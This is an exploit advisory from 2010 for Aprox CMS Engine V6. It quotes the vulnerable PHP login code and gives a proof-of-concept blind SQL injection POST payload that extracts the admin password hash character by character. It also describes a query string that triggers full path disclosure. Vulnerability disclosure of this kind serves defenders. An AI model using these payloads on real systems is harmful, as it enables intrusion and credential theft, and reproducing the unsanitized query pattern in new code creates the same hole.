# Exploit Title: Aprox CMS Engine V6 Multiple Vulnerabilities
# Date: 03.10.2010
# Author: Stephan Sattler // http://www.solidmedia.de
# Software Website: http://www.aprox.de/
# Software Link: http://www.aprox.de/index.php?page=d&application=zip&dateiname=AproxEngine_v6
# Version: 6
[ Vulnerability 1]
# Vulnerable Code:
sql_login.inc line 63-91
if (isset($_GET["action"]) && ($_GET["action"] != "")){$action = $_GET["action"];}
unset($password);
if (isset($_POST["password"]) && ($_POST["password"] != "")){$password = md5($_POST["password"]);}
unset($login);
if (isset($_POST["login"]) && ($_POST["login"] != "")){$login = $_POST["login"];}
if (($login=="") or ($password=="")) {echo "Angegeben nicht vollständig!";die;}
$db = mysql_connect(serverhost, user, pass, database);
$abfrage = "select * from ". suffix ."users where login = '$login'";
$res = mysql_db_query(database, "$abfrage");
$num = mysql_num_rows($res);
#echo $num;
if ($num >0)
{
#echo "user gefunden,<br>";
$pass = mysql_result($res, 0, 'password');
if ($password == $pass)
{
echo "Alles OK!!!";
$name = mysql_result($res, 0, 'real_name');
$_SESSION["name"] = $name;
$_SESSION["login"] = $login;
$_SESSION["pass"] = $pass;
$login_gepruefter_user = mysql_result($res, 0, 'gepr_mitglied');
$_SESSION["gepruefter_user"] = $login_gepruefter_user;
# Explanation:
$_POST["login"] isn't sanitized before executing the database query.
An attacker can use this for a blind SQL injection attack.
# Exploiting the Vulnerability // PoC:
URL: http://[site]/[path]/index.php?page=sql_login
Postdata(Example for the admin user which is created after install):
login=admin' and ascii(substring((SELECT concat(password) from aprox_users limit 0,1),1,1))>'100&password=passwort&Submit=Login
->if login succeeds, the first character of the hash is greater than d(ascii 100).
An attacker can insert his/her own login credentials and test it with them or do it with benchmark() without a user-account.
Aprox stores failed logins in a Session so this won't prevent an attack.
[Vulnerability 2]
# Path Disclosure
For Example: http://[site]/[path]/index.php?id=1 AnD 1=1
will provoke an error so the full path will be presented to you.